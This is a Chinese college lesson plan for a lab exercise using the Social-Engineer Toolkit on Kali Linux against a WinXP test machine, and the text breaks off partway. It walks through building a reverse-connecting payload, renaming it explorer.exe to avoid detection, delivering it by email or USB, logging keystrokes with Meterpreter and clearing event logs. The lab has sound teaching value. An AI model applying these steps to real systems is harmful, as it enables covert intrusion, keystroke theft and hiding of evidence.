第18次課(實驗9)使用SET實施攻擊

1、湖南商務(wù)職業(yè)技術(shù)學(xué)院網(wǎng)絡(luò)安全技術(shù)教案授課教師：謝立靖湖南商務(wù)職業(yè)技術(shù)學(xué)院教師授課課時計劃課程章節(jié)及 主 題實驗9 使用SET實施攻擊授課老師簽字教研室主任簽字教學(xué)目的：1. 掌握利用SET實施攻擊的方法教學(xué)重點：1. 攻擊載荷的選擇教學(xué)難點：1. 攻擊載荷的選擇教學(xué)方法：案例教學(xué)，講授、演示、練習(xí)三者結(jié)合。授課班次14計網(wǎng)1授課日期2016.04.29授課地點S1-502教 學(xué) 過 程 及 內(nèi) 容 提 要（第18次課）一、實驗內(nèi)容使用SET實施攻擊實驗指導(dǎo)一一、實訓(xùn)題目：使用SET實施攻擊 二、實訓(xùn)目的：1.掌握社會工程學(xué)工具包的使用三、實訓(xùn)要求：1.啟動社會工程學(xué)工具包，選擇需要的攻擊載荷；

2、2.傳遞攻擊載荷給目標系統(tǒng)；3.收集目標系統(tǒng)數(shù)據(jù)；4.清除蹤跡。五、實訓(xùn)步驟：1. 啟動社會工程學(xué)工具包，應(yīng)用程序->漏洞利用工具集->social engineering toolkit,或者在終端執(zhí)行如下命令：rootkali:# setoolkit。（注：本實驗運行環(huán)境為Kali linux 1.0.7）執(zhí)行上述命令后，將輸出如下所示的信息：- New set.config.py file generated on: 2016-05-02 18:08:36.594859- Verifying configuration update.* Update verified, co

3、nfig timestamp is: 2016-05-02 18:08:36.594859* SET is using the new config, no need to restartCopyright 2015, The Social-Engineer Toolkit (SET) by TrustedSec, LLCAll rights reserved.Redistribution and use in source and binary forms, with or without modification, are permitted provided that the follo

4、wing conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentatio

5、n and/or other materials provided with the distribution. * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS

6、AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL

7、, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR

8、OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-

9、source application.Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET

10、in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug (most likely will never happen) or the beer (also most likely will never happen).The Social-Engineer Toolkit is designed purely for good and not evil. If you are plannin

11、g on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful

12、 purposes only.Do you agree to the terms of service y/n: 輸出的信息詳細的介紹了SET。該信息在第一次運行時才會顯示。在該界面接受這部分信息后，才可進行其他操作。2在上述界面中輸入y，顯示如下所示信息：以上顯示了社會工程學(xué)工具包的創(chuàng)建者、版本、代號及菜單信息。此時可以根據(jù)自己的需要，選擇相應(yīng)的編號進行操作。3.選擇攻擊社會工程學(xué)，在菜單中的編號為1，所以在set>后面輸入1，將顯示如下信息：以上信息顯示了攻擊社會工程學(xué)的菜單選項，這時就可以選擇攻擊工程學(xué)的類型，然后進行攻擊。4.這里選擇創(chuàng)建一個攻擊載荷和監(jiān)聽器，輸入編號4。輸入本地

13、主機的IP地址192.168.1.108（即以當前Kali Linux的實際IP地址為準），如下所示：輸出的信息顯示了可生成的所有攻擊載荷，此時根據(jù)自己的目標系統(tǒng)選擇相應(yīng)的攻擊載荷。5.本例中攻擊的目標系統(tǒng)為WinXP 32位，所以這里選擇編號2，如下所示：6.這里選擇第4種，輸入編號4，如下所示：在接下來輸出的信息顯示了設(shè)置社會工程學(xué)的一個過程，在該過程中將指定的IP地址與端口進行了綁定，并且打開了一個handler。這里將IP地址與端口進行綁定，是因為一個主機上可能存在多個網(wǎng)卡，但是端口號是不變的。這樣啟動監(jiān)聽器后，攻擊主機將等待被滲透攻擊的系統(tǒng)來連接，并負責(zé)處理這些網(wǎng)絡(luò)連接。接下來，完成

14、傳遞攻擊載荷給目標系統(tǒng)，步驟如下：6.社會工程學(xué)工具默認安裝在/usr/share/set下，在該目錄中有一個exe文件，名為payload.exe。在滲透測試時為避免被目標主機用戶發(fā)現(xiàn)，建議修改該文件名，然后再發(fā)送給其他人（通過郵件或U盤）。7.修改payload.exe文件名：mv payload.exe explorer.exe（在本實驗中可以不改名，直接將payload.exe文件復(fù)制粘貼到winxp中）8.將該文件傳遞其他人。當該內(nèi)容被目標系統(tǒng)中的用戶打開后，將會與攻擊者建立一個活躍的會話?，F(xiàn)在，攻擊者就可以在目標系統(tǒng)上做自己想要做的事。在WinXP系統(tǒng)中打開payload.exe。

15、回到Kali Linux界面?？吹組eterpreter session 1 opened時表示kali linux與winxp已經(jīng)建立了連接。接下來，便是收集目標系統(tǒng)數(shù)據(jù)。9.激活Meterpreter會話。執(zhí)行命令如下所示：Msf exploit(handler)>sessions -i 110.開戶鍵盤記錄器。執(zhí)行命令如下所示：Meterpreter>keyscan_start11.收集目標系統(tǒng)中的數(shù)據(jù)。回到Winxp中，打開記事本，隨便輸入一段字符，如下所示：執(zhí)行命令如下所示：Meterpreter>keyscan_dump從輸出的信息可以看到，目標系統(tǒng)（即winxp

16、系統(tǒng)中）通過鍵盤輸入了fdsafsafsdfsadsa等字符。接下來，清除蹤跡。12.激活meterpreter會話，執(zhí)行如下命令：Msf exploit(handler)>sessions i 113.在metasploit中的irb命令可以清除蹤跡。執(zhí)行如下命令：Meterpreter>irb輸出的信息中看到>>提示符時，表示成功運行了irb命令。14.清除所有日志，執(zhí)行如下命令：>>log=client.sys.eventlog.open(system)>>log=client.sys.eventlog.open(security)>>